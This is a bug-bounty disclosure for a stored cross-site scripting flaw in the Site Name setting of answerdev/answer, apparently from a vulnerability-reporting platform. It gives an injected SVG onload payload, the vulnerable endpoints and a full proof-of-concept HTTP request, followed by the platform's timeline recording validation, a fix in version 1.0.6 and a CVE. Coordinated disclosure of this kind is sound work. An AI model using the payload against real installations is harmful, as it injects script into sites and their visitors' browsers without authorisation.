Stored XSS in answerdev/answer


Reported on

Feb 10th 2023


answer has a feature to customize the "Site Name" during installation or in the settings page , due to a bad sanitization it allows to put arbitrary html code which allows to execute javascript code.

Everytime a user enter in the website, the xss is triggered.

Injected payload

"><svg onload=alert(1)//

Vulnerable endpoint:

  1. https://<yourdomain>/admin/general
  2. https://<yourdomain>/installation/base-info

Proof of Concept (in installation page)

POST /installation/base-info HTTP/1.1
Host: localhost:9080
Content-Length: 175
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Content-Type: application/json
Accept-Language: en_US
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: http://localhost:9080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9080/install
Accept-Encoding: gzip, deflate
Connection: close

{"lang":"en_US","site_name":"\"><svg onload=alert(1)//","site_url":"http://localhost:9080","contact_email":"","name":"admin","password":"admin","email":""}

i hope i was helpful.


The impact is JavaScript Code Execution. However, admin privileges are required to edit the vulnerable input fields.

We are processing your report and will contact the answerdev/answer team within 24 hours. 2 months ago
We have contacted a member of the answerdev/answer team and are waiting to hear back 2 months ago
joyqi validated this vulnerability 24 days ago
Hakiduck has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
joyqi marked this as fixed in 1.0.6 with commit 9870ed 24 days ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
joyqi published this vulnerability 24 days ago
to join this conversation